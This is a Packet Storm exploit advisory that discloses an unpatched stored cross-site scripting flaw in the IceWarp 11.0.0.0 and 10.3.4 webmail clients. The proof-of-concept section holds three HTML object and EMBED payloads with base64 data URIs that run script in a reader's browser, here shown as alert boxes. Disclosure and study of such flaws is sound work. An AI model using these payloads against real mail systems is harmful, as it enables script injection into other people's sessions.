ICEWARP 11.0.0.0 Script Insertion

2014-02-20T00:00:00
ID PACKETSTORM:125309
Type packetstorm
Reporter Usman Saeed
Modified 2014-02-20T00:00:00

Description

                                        
                                            `Disclaimer:  
[This code is for Educational Purposes , I would Not be responsible   
for any misuse of this code]  
  
Attack type : Remote  
Patch Status : Unpatched  
Exploitation :  
# Author: Usman Saeed  
# Company: Xc0re Security Research Group  
# Website: http://www.xc0re.net  
# Twitter : http://twitter.com/emuess  
# Original Advisory DATE: [29/01/2014]  
# Publishing of Exploit Date : [17/02/2014]  
  
Description  
===========  
It is possible to inject malicious HTML Elements into the email and   
cause a Cross site Scripting (XSS) payload to be executed.  
  
Tested ICEWARP Client Versions (http://www.icewarp.com/)  
============================  
Version : 11.0.0.0 (2014-01-25) x64  
& 10.3.4  
  
Browser Used  
=============  
Mozilla Firefox 26.0  
  
Proof Of Concept  
============  
Please find the details about the exploit : http://xc0re.net/blog/?p=363  
  
Proof Of Concept  
=================  
For Version: ICEWARP 11.0.0  
  
><object data=”data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+”></object>>  
  
><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>>  
  
Note:  
  
For Version: ICEWARP 10.3.4  
  
<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>  
`